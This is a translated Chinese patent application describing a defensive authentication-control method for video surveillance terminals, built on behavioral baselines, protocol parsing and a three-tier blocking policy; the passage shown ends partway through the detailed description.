Video terminal authentication control method, system and device
By establishing behavioral baselines and protocol parsing strategies on video terminals, and monitoring access behavior in real time to calculate deviation and verification results, the problems of "terminal agnosticness" and "impersonation invisibility" in video terminal authentication control are solved, realizing intelligent multi-layer authentication processing and improving security defense capabilities and operation and maintenance efficiency.
Patent Information
- Authority / Receiving Office
- CN · China
- Patent Type
- Applications(China)
- Current Assignee / Owner
- HANG ZHOU LING XIN SHU KE XIN XI JI SHU YOU XIAN GONG SI
- Filing Date
- 2026-05-21
- Publication Date
- 2026-06-19
AI Technical Summary
Existing video terminals suffer from problems such as "terminal agnosticism," "invisibility of counterfeiting," and "unintelligent policies" in security authentication control, making them unable to effectively defend against internal and external threats and difficult to adapt to dynamic device access and business changes.
By setting up behavior monitoring points on video terminals, constructing behavior baselines and protocol parsing strategies, monitoring access behavior in real time, generating behavior fingerprint data, and calculating behavior deviation and protocol verification results, combined with a three-layer priority authentication process, dual authentication control is achieved.
It effectively detects malicious file implantation and abnormal process activity, defends against unauthorized video access based on protocol vulnerabilities, resolves conflicts between multiple strategies, and improves the intelligence of security authentication and operational efficiency.
Smart Images

Figure CN122247761A_ABST
Abstract
Description
Technical Field
[0001] This invention relates to the field of video terminal authentication control, and in particular to a video terminal authentication control method, system and device. Background Technology
[0002] Video surveillance systems communicate based on various protocols, but the following security issues exist in their communication authentication process: 1. For firmware tampering detection of video terminals, existing technologies use simple MAC / IP address binding or pre-shared key authentication, which cannot defend against internal attacks launched by "legitimate terminals" with legitimate identities but which have been implanted with malicious code. They can only achieve coarse-grained "identity" verification and cannot ensure the software integrity of the device "body" and the "trustworthiness" of its runtime behavior. This allows attackers to use compromised terminals with legitimate identities to launch malicious file operations, abnormal external connections, data theft, and other attacks from within, resulting in an internal threat problem of "terminal agnosticness". 2. Existing authentication and testing methods for video terminals can only identify a limited number of general protocols and lack in-depth analysis capabilities for proprietary video protocols widely used in the power industry (such as GB / T 28181 and GB 35114) and vendor-specific protocols. This results in the inability to effectively identify and filter advanced threats such as malicious control commands (such as unauthorized PTZ control) and unauthorized video stream calls carried in protocol fields, and also makes it impossible to perform compliance checks on the video content itself, resulting in the problem of "invisible counterfeiting" external threats. 3. The configuration and management of existing authentication processing policies mainly rely on manual processing, which is difficult to adapt to dynamic access of devices and changes in business. Policy failure and policy redundancy ("zombie policies") are common problems, and the threat signature database is updated late, which cannot cope with rapidly changing network attacks, resulting in the technical problem of "unintelligent policies".
[0003] In summary, existing video terminals still suffer from technical problems in the security authentication and control process, such as "terminal unknowability, undetectable counterfeiting, and unintelligent strategies." Summary of the Invention
[0004] In view of this, the purpose of this invention is to provide a video terminal authentication control method, system, and device. This method performs dual authentication control from two analytical levels: the behavioral deviation degree of the video terminal and the protocol verification result. By analyzing the behavioral deviation degree, it can detect the implantation of any malicious files (malicious firmware) and abnormal process activities, thereby solving the problem of "terminal agnosticism". At the same time, by analyzing the protocol verification result, it effectively defends against illegal video access based on protocol vulnerabilities, thereby solving the problem of "impersonation invisible" access behavior. In addition, this method performs unified scheduling processing for video terminals based on behavioral deviation degree and protocol verification result, and can resolve conflicts of multiple policies through a multi-level priority authentication process, thereby solving the problem of "unintelligent policies".
[0005] In a first aspect, embodiments of the present invention provide a video terminal authentication control method, the method comprising: Based on the kernel environment parameters of the video terminal, behavior monitoring points are set, a behavior baseline is constructed by the attribute values of executable files in the system path of the video terminal, and the protocol parsing strategy is determined by the protocol feature bytes of the video terminal. The access behavior of video terminals is monitored in real time using behavior monitoring points, and behavior fingerprint data is generated by the continuous behavior sequence corresponding to the access behavior. The behavioral deviation between the behavioral fingerprint data and the behavioral baseline is calculated. The protocol verification result of the access behavior is obtained by parsing and verifying the protocol signaling of the access behavior using the protocol parsing strategy. The video terminal executes the authentication process by controlling behavioral deviation and protocol verification results.
[0006] Optionally, behavior monitoring points can be set based on kernel environment parameters of the video terminal, including: The kernel environment parameters are determined based on the system kernel type of the video terminal, and the file monitoring strategy and kernel communication strategy of the video terminal are determined through the kernel environment parameters. The file writing monitoring strategy, network connection monitoring strategy, and process creation monitoring strategy of the video terminal are determined by using file monitoring strategy and kernel communication strategy. Configure video terminal behavior monitoring points based on file write monitoring strategy, network connection monitoring strategy, and process creation monitoring strategy.
[0007] Optionally, a behavioral baseline can be constructed using the attribute values of executable files in the system directory of the video terminal, including: When the video terminal is detected to be in firmware upgrade state or first network access state, obtain all executable files under the system path and business application path of the video terminal, and obtain the network data and manufacturer data of the video terminal. By utilizing the filename, version number, and numeric hash value in the executable file's attribute values, as well as the IP address and MAC address in the network data and the corresponding ID value in the manufacturer data, a behavioral baseline is constructed based on the unique identifier value corresponding to the video terminal.
[0008] Optionally, the protocol parsing strategy can be determined by the protocol feature bytes of the video terminal, including: Determine the public video protocol corresponding to the video terminal, and determine the first protocol parsing strategy through the first protocol feature byte corresponding to the protocol feature field of the public video protocol; The private video protocol corresponding to the video terminal is determined, the offset is determined by the protocol type of the private video protocol, the second protocol feature byte of the offset is extracted according to the n-gram algorithm, and the second protocol parsing strategy is determined by the second protocol feature byte. The encrypted video protocol corresponding to the video terminal is determined. After decrypting the preset keyframes according to the boundary decryption proxy strategy and watermark audit strategy of the encrypted video protocol, the third protocol parsing strategy is determined using the generated digital watermark.
[0009] Optionally, the access behavior of the video terminal is monitored in real time using behavior monitoring points, and behavior fingerprint data is generated through the continuous behavior sequence corresponding to the access behavior, including: Use behavior monitoring points to monitor the file writing behavior, network connection behavior, and creation behavior of video terminals in real time. The sequence of consecutive actions corresponding to the access actions is determined according to the execution order of creation, file writing, and network connection actions. The Markov chain model is used to compress continuous behavior sequences into behavior fingerprint vectors, and the hash value of the behavior fingerprint vectors is used to generate behavior fingerprint data of access behaviors.
[0010] Optionally, calculate the behavioral deviation between the behavioral fingerprint data and the behavioral baseline, including: The calculation and execution strategy for the behavioral baseline is determined by using the file modification timestamps corresponding to the behavioral fingerprint data; The similarity comparison results between behavioral fingerprint data and behavioral baseline are calculated based on the computational execution strategy. The behavioral similarity between the behavioral fingerprint data and the behavioral baseline is determined by the similarity comparison results, and the behavioral deviation is calculated based on the behavioral similarity.
[0011] Optionally, the protocol verification result of the access behavior is obtained by parsing and verifying the protocol signaling of the access behavior using a protocol parsing strategy, including: Obtain the protocol signaling of the access behavior, and use the protocol parsing strategy to determine the semantic parsing tree corresponding to the protocol signaling; Based on the network IP address corresponding to the protocol signaling, the operation type data, target resource data, and operator data in the message body of the protocol signaling are obtained by parsing and retrieving them through a semantic parsing tree. The protocol verification result of the access behavior is obtained by using the three data sets corresponding to the operation type data, target resource data, and operator data.
[0012] Optionally, the steps for controlling the video terminal to execute the authentication process based on behavioral deviation and protocol verification results include: Determine the deviation threshold and protocol verification conditions for the video terminal based on the type parameters of the access behavior; If the deviation of the behavior is greater than the deviation threshold and the protocol verification result does not meet the protocol verification conditions, the authentication process is determined to be a forced blocking of the authentication process. If the behavior deviation is greater than the deviation threshold and the protocol verification result meets the protocol verification conditions, the authentication process is determined to be the behavior abnormality authentication process. If the deviation of the behavior is not greater than the deviation threshold and the protocol verification result meets the protocol verification conditions, the authentication process is determined to be an operational continuous process. Control the video terminal to execute the authentication process; among which, the priority of the forced blocking authentication process is higher than that of the abnormal authentication process, and the priority of the abnormal authentication process is higher than that of the operational continuous process.
[0013] Secondly, the present invention provides a video terminal authentication control system, the system comprising: The acquisition layer is used to set behavior monitoring points based on the kernel environment parameters of the video terminal, construct a behavior baseline through the attribute values of executable files in the system path of the video terminal, and determine the protocol parsing strategy through the protocol feature bytes of the video terminal. Access layer: Used to monitor the access behavior of video terminals in real time using behavior monitoring points, and generate behavior fingerprint data through the continuous behavior sequence corresponding to the access behavior; Control layer: Used to calculate the behavioral deviation between behavioral fingerprint data and behavioral baseline, and to obtain the protocol verification result of access behavior by parsing and verifying the protocol signaling of access behavior using protocol parsing strategy; Application layer: Used to control the video terminal to perform the authentication process based on behavior deviation and protocol verification results.
[0014] Thirdly, embodiments of the present invention also provide a video terminal authentication control device, which includes a processor and a memory. The memory stores computer-executable instructions that can be executed by the processor, and the processor executes the computer-executable instructions to implement the steps of the video terminal authentication control method provided in the first aspect.
[0015] This invention provides a video terminal authentication control method, system, and device. During the authentication process of a video terminal, the method first sets behavior monitoring points based on the kernel environment parameters of the video terminal, constructs a behavior baseline using the attribute values of executable files in the system path of the video terminal, and determines the protocol parsing strategy using the protocol feature bytes of the video terminal. Then, it uses the behavior monitoring points to monitor the access behavior of the video terminal in real time and generates behavior fingerprint data from the continuous behavior sequences corresponding to the access behaviors. Subsequently, it calculates the behavior deviation between the behavior fingerprint data and the behavior baseline, and uses the protocol parsing strategy to parse and verify the protocol signaling of the access behaviors to obtain the protocol verification result of the access behaviors. Finally, it controls the video terminal to execute the authentication process based on the behavior deviation and the protocol verification result. This method employs dual authentication control from two analytical levels: behavioral deviation and protocol verification results. Behavioral deviation detects the implantation of any malicious files (malicious firmware) and abnormal process activity, thus addressing the "terminal agnosticness" problem. Simultaneously, protocol verification results effectively defend against unauthorized video access based on protocol vulnerabilities, resolving the "impersonation invisible" problem of access behavior. Furthermore, this method unifies the scheduling of video terminals based on behavioral deviation and protocol verification results, and resolves conflicts between multiple policies through a multi-level priority authentication process, thus addressing the "unintelligent policy" problem.
[0016] Other features and advantages of the invention will be set forth in the description which follows, and will be apparent in part from the description, or may be learned by practicing the invention. The objects and other advantages of the invention are realized and obtained in accordance with the structures particularly pointed out in the description, claims and drawings.
[0017] To make the above-mentioned objects, features and advantages of the present invention more apparent and understandable, preferred embodiments are described below in detail with reference to the accompanying drawings. Attached Figure Description
[0018] To more clearly illustrate the specific embodiments of the present invention or the technical solutions in the prior art, the drawings used in the description of the specific embodiments or the prior art will be briefly introduced below. Obviously, the drawings described below are some embodiments of the present invention. For those skilled in the art, other drawings can be obtained from these drawings without creative effort.
[0019] Figure 1 A flowchart of a video terminal authentication control method provided in an embodiment of the present invention; Figure 2 A flowchart of another video terminal authentication control method provided in an embodiment of the present invention; Figure 3This is a schematic diagram of the structure of a video terminal authentication control system provided in an embodiment of the present invention; Figure 4 This is a schematic diagram of another video terminal authentication control system provided in an embodiment of the present invention; Figure 5 This is a schematic diagram of the structure of an electronic device provided in an embodiment of the present invention.
[0020] icon: 310 - Acquisition Layer; 320 - Access Layer; 330 - Control Layer; 340 - Application Layer; 101 - Processor; 102 - Memory; 103 - Bus; 104 - Communication interface. Detailed Implementation
[0021] To make the objectives, technical solutions, and advantages of the embodiments of the present invention clearer, the technical solutions of the present invention will be clearly and completely described below in conjunction with the embodiments. Obviously, the described embodiments are only some embodiments of the present invention, not all embodiments. Based on the embodiments of the present invention, all other embodiments obtained by those skilled in the art without creative effort are within the scope of protection of the present invention.
[0022] To facilitate understanding of this embodiment, a video terminal authentication control method disclosed in this embodiment of the invention will first be introduced, such as... Figure 1 As shown, the method includes: Step S101: Set behavior monitoring points based on the kernel environment parameters of the video terminal, construct a behavior baseline through the attribute values of executable files in the system path of the video terminal, and determine the protocol parsing strategy through the protocol feature bytes of the video terminal.
[0023] Specifically, monitoring points for three key behaviors—file writing, network connection, and process creation—can be set based on the Linux kernel inotify+netlink mechanism of the video terminal. When the video terminal first connects to the network or upgrades its firmware, the filenames, version numbers, and SHA-256 hash values of executable files in key system directories such as / bin, / sbin, / etc, and business application paths are collected. Combined with the terminal's IP / MAC address and vendor information, a trusted software baseline and dynamic behavior baseline are constructed. At the same time, general and industry-specific video protocol models such as GB / T28181, GB 35114, and RTSP are pre-integrated. For unknown private protocols, the n-gram algorithm is used to extract feature bytes, and the protocol state machine is constructed by combining the sequence comparison algorithm to determine the appropriate video protocol deep parsing and semantic verification strategy.
[0024] Step S102: Use behavior monitoring points to monitor the access behavior of video terminals in real time, and generate behavior fingerprint data through the continuous behavior sequence corresponding to the access behavior.
[0025] By deploying lightweight security probes on video terminals, the system monitors access behaviors such as writing sensitive files, adding new TCP / UDP connections, and creating new processes in real time using preset key behavior monitoring points. Instead of collecting full behavior logs, the system compresses the monitored continuous behavior sequences into behavior fingerprint vectors using a Markov chain model to generate terminal behavior fingerprint data.
[0026] Step S103: Calculate the behavioral deviation between the behavioral fingerprint data and the behavioral baseline, and obtain the protocol verification result of the access behavior by parsing and verifying the protocol signaling of the access behavior using the protocol parsing strategy.
[0027] The generated behavioral fingerprint data is compared with pre-built trusted software baselines and dynamic behavioral baselines to calculate the behavioral deviation between the two and identify terminal anomalies such as firmware tampering, abnormal processes, and malicious external connections. At the same time, a predetermined protocol parsing strategy is adopted to perform deep parsing of the video protocol signaling corresponding to the access behavior. The "operation type + target resource + operator" triple is extracted through semantic parsing tree to complete the permission and compliance verification. Boundary decryption proxy and digital watermark audit are performed simultaneously on the encrypted video stream to finally obtain the protocol verification result of the access behavior.
[0028] Step S104: Control the video terminal to execute the authentication process based on the behavior deviation and protocol verification results.
[0029] By integrating behavioral deviation and protocol verification results, and relying on a three-layer priority policy system (L1 forced blocking, L2 abnormal behavior, L3 continuous operation), the system controls the video terminal to perform authentication processing. When the behavioral deviation exceeds the standard or the protocol verification fails, automatic blocking, alarm prompts, or manual review are executed according to the priority rules, while normal access behavior is directly allowed. At the same time, the authentication results are synchronized to the intelligent policy center to optimize the behavioral baseline and protocol parsing policy, and clean up redundant policies to form an automated operation and maintenance closed loop.
[0030] Optionally, behavior monitoring points can be set based on the kernel environment parameters of the video terminal, including the following steps: Step S201: Determine the kernel environment parameters based on the system kernel type of the video terminal, and determine the file monitoring strategy and kernel communication strategy of the video terminal through the kernel environment parameters.
[0031] Step S202: Determine the file write monitoring strategy, network connection monitoring strategy, and process creation monitoring strategy of the video terminal using file monitoring strategy and kernel communication strategy; Step S203: Set up behavior monitoring points for the video terminal based on file writing monitoring strategy, network connection monitoring strategy, and process creation monitoring strategy.
[0032] In the specific execution process, the appropriate kernel environment parameters are first determined based on the type of Linux system kernel running on the video terminal. Based on these kernel environment parameters, the native inotify file monitoring mechanism and netlink kernel communication mechanism of the Linux kernel are enabled. This determines the lightweight file monitoring strategy and kernel-mode communication strategy of the video terminal, ensuring that the monitoring operation does not consume too much terminal CPU and bandwidth resources.
[0033] Then, based on the established file monitoring and kernel communication strategies, further refine the file writing monitoring strategy, network connection monitoring strategy, and process creation monitoring strategy for the video terminal, clarify the monitoring scope, collection rules, and triggering conditions of each strategy, abandon the full system call collection mode, and focus only on monitoring key abnormal behaviors.
[0034] For example, file write monitoring strategy: only monitor write events to sensitive paths such as / etc, / bin, and application directories; Network connectivity monitoring strategy: Monitor only newly added TCP / UDP outbound connections (ignore state changes of established connections). Process creation monitoring strategy: Capture the new process name and parameters through the execve event, and ignore thread creation.
[0035] Finally, based on the three specific monitoring strategies of file writing, network connection, and process creation, key behavior monitoring points are set in the lightweight security probe of the video terminal to achieve targeted monitoring of three core behaviors: writing to sensitive paths of the terminal, adding external connections, and creating new processes.
[0036] Optionally, a behavioral baseline can be constructed using the attribute values of executable files in the system directory of the video terminal, including the following steps: Step S301: When it is detected that the video terminal is in firmware upgrade state or first network access state, obtain all executable files under the system path and business application path of the video terminal, and obtain the network data and manufacturer data of the video terminal. Step S302: Using the filename, version number, and numeric hash value in the executable file's attribute values, as well as the IP address and MAC address in the network data and the ID value corresponding to the manufacturer data, construct a behavioral baseline according to the unique identifier value corresponding to the video terminal.
[0037] Specifically, when a video terminal is detected to be registering on the network for the first time or upgrading its firmware version, the terminal's lightweight security probe initiates a data collection process to obtain all executable files in the video terminal's critical system paths ( / bin, / sbin) and dedicated business application paths, while simultaneously collecting terminal network data (IP address, MAC address) and device manufacturer identification data.
[0038] Then, the filename, version number, and SHA-256 hash value of the executable file are extracted as core attribute features. Combined with the terminal IP address, MAC address, and vendor ID information, and using the unique identifier of the video terminal as an index, a trusted software behavior baseline exclusive to the terminal is constructed as the benchmark for subsequent trusted verification of terminal behavior.
[0039] Optionally, the protocol parsing strategy can be determined by analyzing the protocol feature bytes of the video terminal, including the following steps: Step S401: Determine the public video protocol corresponding to the video terminal, and determine the first protocol parsing strategy through the first protocol feature byte corresponding to the protocol feature field of the public video protocol; Step S402: Determine the private video protocol corresponding to the video terminal, determine the offset bit using the protocol type of the private video protocol, extract the second protocol feature byte of the offset bit according to the n-gram algorithm, and determine the second protocol parsing strategy through the second protocol feature byte; Step S403: Determine the encrypted video protocol corresponding to the video terminal, decrypt the preset keyframes according to the boundary decryption proxy strategy and watermark audit strategy of the encrypted video protocol, and then use the generated digital watermark to determine the third protocol parsing strategy.
[0040] First, identify the public video protocols used by the video terminal (including general video protocols such as GB / T 28181, GB 35114, RTSP, RTMP, SIP, and industry-specific protocols such as MQTT). Based on the first protocol feature byte corresponding to the feature field of this type of standard protocol, match the pre-integrated complete protocol model, determine the first protocol parsing strategy adapted to the public protocol, and realize the direct parsing of standard protocol signaling.
[0041] Then, the private video protocol traffic transmitted by the video terminal is identified, the fixed feature offset of the private protocol is located, the second protocol feature byte at the offset is extracted using the n-gram algorithm, the protocol handshake interaction mode is identified by combining the sequence comparison algorithm and the protocol state machine is automatically constructed, and the second protocol parsing strategy for reverse parsing of the private protocol and illegal state transition detection is determined accordingly.
[0042] Finally, for encrypted video protocols used by video terminals (such as GB 35114 encrypted video streams), a boundary decryption proxy strategy and a watermark audit strategy are enabled to decrypt the protocol signaling and video key frame headers, extract and verify digital watermarks to defend against video replay attacks, and a third protocol parsing strategy adapted to encrypted video streams is determined based on this security processing logic.
[0043] Optionally, the access behavior of the video terminal is monitored in real time using behavior monitoring points, and behavior fingerprint data is generated through the continuous behavior sequence corresponding to the access behavior, including the following steps: Step S501: Use behavior monitoring points to monitor the file writing behavior, network connection behavior, and creation behavior of the video terminal in real time. Step S502: Determine the sequence of consecutive actions corresponding to the access actions according to the execution order of creation actions, file writing actions, and network connection actions; Step S503: Compress the continuous behavior sequence into a behavior fingerprint vector using a Markov chain model, and use the hash value of the behavior fingerprint vector to generate behavior fingerprint data of the access behavior.
[0044] The above steps first rely on three key behavior monitoring points: file writing, network connection, and process creation. Based on the Linux kernel inotify+netlink mechanism, they monitor the video terminal's access behaviors in real time, including sensitive path file writing, new TCP / UDP external connections, and new process creation, while ignoring non-critical behaviors such as changes in the state of established connections and thread creation.
[0045] Then, based on the actual process creation behavior, file writing behavior, and network connection behavior sequence executed by the video terminal, the continuous behavior sequence corresponding to the current access behavior is sorted out and determined, and the behavior execution link is fully restored.
[0046] Subsequently, the continuous behavioral sequence is compressed into a lightweight behavioral fingerprint vector using a Markov chain model. The hash value of this vector is calculated and used to generate behavioral fingerprint data. Only the fingerprint hash value is uploaded instead of the original behavioral log, which greatly reduces the amount of data transmission.
[0047] Optionally, the behavioral fingerprint data is calculated to show the behavioral deviation from the behavioral baseline, including the following steps: Step S601: Determine the calculation and execution strategy for the behavioral baseline using the file modification timestamps corresponding to the behavioral fingerprint data; Step S602: Calculate the similarity comparison results between the behavioral fingerprint data and the behavioral baseline based on the computation execution strategy; Step S603: Determine the behavioral similarity between the behavioral fingerprint data and the behavioral baseline through the similarity comparison results, and calculate the behavioral deviation based on the behavioral similarity.
[0048] In the specific implementation process, the video terminal is first distinguished from the full baseline verification scenario after the first network access / firmware upgrade, or the lightweight verification scenario of daily inspection, based on the file modification timestamp corresponding to the behavior fingerprint data. The calculation execution strategy of behavior baseline (full hash comparison or fast timestamp comparison) is determined accordingly to avoid repeated hash calculation occupying terminal resources.
[0049] Then, according to the predetermined calculation and execution strategy, the behavioral fingerprint data uploaded by the terminal is matched and compared with the pre-stored trusted software baseline and dynamic behavioral baseline to obtain the similarity comparison results between the two.
[0050] Finally, the behavioral similarity between the behavioral fingerprint data and the behavioral baseline is quantified based on the similarity comparison results. The behavioral deviation is calculated using behavioral similarity as the core indicator to determine whether the terminal has any trust anomalies such as firmware tampering, abnormal processes, or malicious external connections.
[0051] Optionally, the protocol verification result of the access behavior is obtained by parsing and verifying the protocol signaling of the access behavior using a protocol parsing strategy, including the following steps: Step S701: Obtain the protocol signaling of the access behavior, and use the protocol parsing strategy to determine the semantic parsing tree corresponding to the protocol signaling; Step S702: According to the network IP address corresponding to the protocol signaling, parse and obtain the operation type data, target resource data and operator data in the message body of the protocol signaling through the semantic parsing tree; Step S703: Obtain the protocol verification result of the access behavior through the three-data set corresponding to the operation type data, target resource data, and operator data.
[0052] First, the video protocol signaling corresponding to the access behavior is obtained (including XML / SDP signaling in the SIP message body). Based on the three types of protocol parsing strategies—public protocol, private protocol, and encrypted protocol—the protocol signaling is converted into a signaling semantic parse tree (SST), providing structured support for the deep semantic decomposition of the protocol signaling.
[0053] Then, using the video terminal IP address associated with the access behavior as an index, the protocol signaling message body is parsed through the signaling semantic parsing tree to accurately extract three core data items: operation type, target resource, and operator, thereby clarifying the operation permissions, resource type (real-time video stream, historical recording, audio), and operation subject information of the access behavior.
[0054] Finally, the operation type, target resource, and operator data are combined into an access control triple. The triple is then validated according to preset security permissions and compliance rules to determine whether there are any anomalies such as unauthorized PTZ control, unauthorized video retrieval, or unauthorized resource access. Ultimately, a protocol validation result for the access behavior is generated, achieving precise resource-level access control.
[0055] Optionally, the steps for controlling the video terminal to execute the authentication process based on behavioral deviation and protocol verification results include the following: Step S801: Determine the deviation threshold and protocol verification conditions corresponding to the video terminal based on the access behavior type parameter; Step S802: If the behavior deviation is greater than the deviation threshold and the protocol verification result does not meet the protocol verification conditions, the authentication process is determined to be a forced blocking authentication process. Step S803: If the behavior deviation is greater than the deviation threshold and the protocol verification result meets the protocol verification conditions, the authentication process is determined to be the behavior abnormality authentication process. Step S804: If the behavior deviation is not greater than the deviation threshold and the protocol verification result meets the protocol verification conditions, then the authentication process is determined to be an operational continuous process. Step S805: Control the video terminal to execute the authentication process; wherein, the priority of the forced blocking authentication process is greater than that of the abnormal authentication process, and the priority of the abnormal authentication process is greater than that of the continuous operation process.
[0056] In specific scenarios, based on parameters such as the business type and terminal attributes of the access behavior, and combined with the compliance rules and security baseline of the intelligent policy hub, a matching behavior deviation threshold and protocol compliance verification condition are set for the video terminal as the judgment benchmark for the three-layer priority authentication.
[0057] If the behavioral deviation exceeds the threshold and the protocol verification result does not meet compliance requirements, the L1 forced blocking authentication process is directly initiated. This process has the highest priority and immediately executes access blocking, threat alerts, and reports security incidents. If the behavioral deviation exceeds the threshold but the protocol verification result meets compliance requirements, the L2 behavioral anomaly authentication process is initiated. This process has the next highest priority and executes behavioral tracing, anomaly alerts, and triggers automatic blocking or manual review based on the confidence threshold. If the behavioral deviation does not exceed the threshold and the protocol verification result meets compliance requirements, the L3 operational continuity process is initiated. This process has the lowest priority and allows normal access while simultaneously performing baseline optimization, zombie policy cleanup, and other operational operations.
[0058] Finally, following the priority rule of L1 forced blocking > L2 abnormal behavior > L3 operational continuity, the video terminal is controlled to execute the corresponding authentication process; when there is a policy conflict, the high-priority judgment result is strictly executed, and at the same time, the intelligent policy center is linked to complete rule fusion, event correlation analysis and visual monitoring to form a closed-loop protection.
[0059] The core of the above steps is to resolve performance degradation issues caused by multi-channel strategy conflicts and specification library expansion, which includes the following two major capabilities: 1. Resolving strategic conflicts: Establishing a three-tier priority system.
[0060] L1 (Forced Blocking): Based on rules such as compliance requirements and characteristics of high-risk vulnerability exploitation, it has the highest priority for forced blocking; L2 (Abnormal Behavior): Based on the analysis of deviations from the terminal behavior baseline (such as unauthorized access), with the next highest priority; L3 (Operational Optimization): Suggestions for cleaning up non-whitelisted access and zombie strategies based on intelligent traffic learning, with the lowest priority.
[0061] When conflicts occur, the strategy is executed from highest to lowest. If the L1 strategy determines that blocking is necessary, the final result is blocking. When L2 and L3 conflict, L2 takes precedence, prompting an alarm for automatic blocking or manual review. For L2 / L3 strategies, source tracing (such as behavioral deviation + protocol anomalies) will be performed. If the threshold is exceeded, automatic blocking will be executed to reduce the problem of delayed manual response.
[0062] 2. Rule fusion optimization: Establishing rule relationships based on attack behavior.
[0063] Attack behavior relationship construction: Attack rules are categorized according to "attack stage" and "attack method," establishing parent-child relationships between rules. Once an attack rule is matched, the rules are automatically logically merged. An alarm is triggered whenever any rule is matched, avoiding duplicate matches. Simultaneously, it features visualized collaborative monitoring: providing a unified dashboard that displays the entire network's attack situation, device resource status, and security event topology in real time. It also correlates terminal behavior alarms with network protocol attack events for rapid fault and threat localization.
[0064] The entity executing the above method can be an intelligent central hub, which interacts with internet terminal devices (i.e., video terminals) through a relevant video security access gateway as a proxy, specifically as follows: Figure 2 As shown. This method involves 5 core levels, each with clearly defined responsibilities and data linkage, forming a complete security protection closed loop: 1. Top-level core control layer: Intelligent hub (system brain, solving the problem of "unintelligent strategy"); 2. Upper-layer baseline support layer: Trusted software baseline system, behavioral baseline system (terminal trusted benchmark, solving the problem of "terminal agnosticness"); 3. Intermediate Data Hub Layer: Software and process information (data aggregation and distribution, connection between baseline and gateway); 4. Middle Security Boundary Layer: Video Security Access Gateway (access authentication and threat detection, solving the problem of "impersonation not being visible"); 5. Bottom terminal device layer: IoT terminal devices (monitoring objects and data sources, terminal-side behavior collection).
[0065] 1. The top-level core control layer is the intelligent hub. The intelligent hub is the core control brain of the entire system, undertaking the core functions of baseline lifecycle management, intelligent policy scheduling, conflict resolution, and rule optimization. Baseline Management and Updates: The intelligent hub interacts bidirectionally with the "Trusted Software Baseline" database on the left and the "Behavioral Baseline" database on the right, supporting the storage, modification, and dynamic iteration of baselines: When a terminal first joins the network / upgrades its firmware, it collects all trusted information about the terminal to complete the initial construction of the baseline; during daily operation and maintenance, the baseline is dynamically optimized based on terminal behavior data and security events to avoid baseline stagnation.
[0066] Baseline Synchronization Distribution: The intelligent hub synchronizes the "Trusted Software Baseline" to the lower-level "Trusted Software Baseline Library" and the "Behavioral Baseline" to the lower-level "Behavioral Baseline Model Library," providing authoritative benchmarks for behavioral verification on the terminal side and gateway side.
[0067] Intelligent policy control: It can include a three-layer priority authentication system. The intelligent hub, based on the behavior data of all terminals in the network and the protocol verification results, achieves the following: Strategy conflict resolution: Strictly follow the priority rule of "L1 mandatory blocking > L2 abnormal behavior > L3 operational continuity" to resolve multi-strategy conflict issues; Rule fusion optimization: Build parent-child relationships for rules based on attack stage / method to avoid duplicate alerts, while also enabling security event correlation analysis and visual monitoring; It completely solves the pain points of manual policy configuration failure, redundancy (zombie policies), and delayed updates, and realizes automated and intelligent policy management.
[0068] 2. Upper Baseline Support Layer: Trusted Software Baseline and Behavioral Baseline. This layer is the core benchmark source for terminal trust verification, addressing the internal threat problem of "terminal agnosticity" from two dimensions: software integrity and operational behavior.
[0069] Figure 2 The left side represents the Trusted Software Baseline System; the top layer is the Trusted Software Baseline Database, which stores all trusted software information collected when the video terminal first enters the network / upgrades firmware, and is the core benchmark for verifying the integrity of the terminal software; the lower layer is the Trusted Software Baseline Library, which receives trusted software baselines synchronized by the intelligent hub and stores the four core software attributes of the terminal: software name, software version, software HASH (SHA-256), and operating system (used for firmware tampering detection and defense against internal attacks that implant malicious firmware).
[0070] Data flow: Intelligent central storage / modification of trusted software baseline → synchronization to trusted software baseline library → providing software-dimensional benchmark data for intermediate layer software and process information.
[0071] Figure 2The right side represents the behavior baseline system; the top layer is the behavior baseline database, which stores the dynamic behavior benchmark model of the video terminal for deviation verification of the terminal's behavior during runtime. The lower layer is the behavior baseline model library, which receives the behavior baseline synchronized by the intelligent hub and stores the four core behavioral characteristics of the terminal: process creation, open ports, external connections, and file read / write (used for abnormal behavior detection, identifying malicious processes, malicious external connections, and other internal threats).
[0072] Data flow: Intelligent central storage / modification of behavioral baseline → synchronization to behavioral baseline model library → providing benchmark data for behavioral dimensions of intermediate layer software and process information.
[0073] 3. Intermediate Data Hub Layer: Software and Process Information. This layer is the core data hub connecting the upper-layer baseline library and the lower-layer gateway, undertaking the functions of data aggregation, feature extraction, and unified distribution.
[0074] Data aggregation: Integrate software attribute data from the trusted software baseline library on the left and behavioral feature data from the behavioral baseline model library on the right to form a complete software + behavior profile of the terminal, providing full-dimensional data support for subsequent verification.
[0075] Data distribution: The aggregated software and process baseline information is uniformly distributed to multiple lower-layer video security access gateways, providing a baseline basis for behavior deviation calculation and protocol depth analysis on the gateway side.
[0076] 4. Intermediate Security Boundary Layer: Video Security Access Gateway. This layer serves as the security boundary gateway between the terminal and the central control unit. It is a critical node for defending against external spoofing attacks and internal terminal threats, addressing the issue of "invisible spoofing" as a problem with external threats. This method employs a distributed deployment of multiple video security access gateways, each connecting to IoT terminal devices in different regions / batches, supporting parallel access and security management of a large number of video terminals. Core security capabilities are as follows: Behavioral deviation verification: Based on the software and process baselines issued by the intelligent hub, the similarity of the behavioral fingerprint data uploaded by the terminal is compared, the behavioral deviation is calculated, and internal threats to the terminal such as firmware tampering, abnormal processes, and malicious external connections are accurately identified, upgrading from "identity verification" to "ontology trust".
[0077] Deep Protocol Analysis and Verification: Based on three protocol analysis strategies (comprehensive coverage of public / private / encrypted protocols), deep analysis of terminal protocol signaling is performed. The "operation type + target resource + operator" triple is extracted through the Signalling Semantic Tree (SST); resource-level access control is implemented, accurately identifying external spoofing threats such as unauthorized PTZ control, unauthorized video stream calls, and video replay attacks, addressing the pain point that standard protocols cannot cover dedicated / private protocols in the power industry.
[0078] Authentication control execution: Based on a three-tier priority authentication system, the corresponding authentication process is executed according to the degree of behavioral deviation and the protocol verification result, as follows: Excessive behavioral deviation + protocol verification failure: triggers L1 forced blocking, immediately intercepting access; If the behavior deviation exceeds the limit and the protocol verification passes: trigger an L2 behavior anomaly alarm, and execute automatic blocking or manual review; Normal behavior + protocol verification passed: L3 operation continues, normal release and baseline optimization.
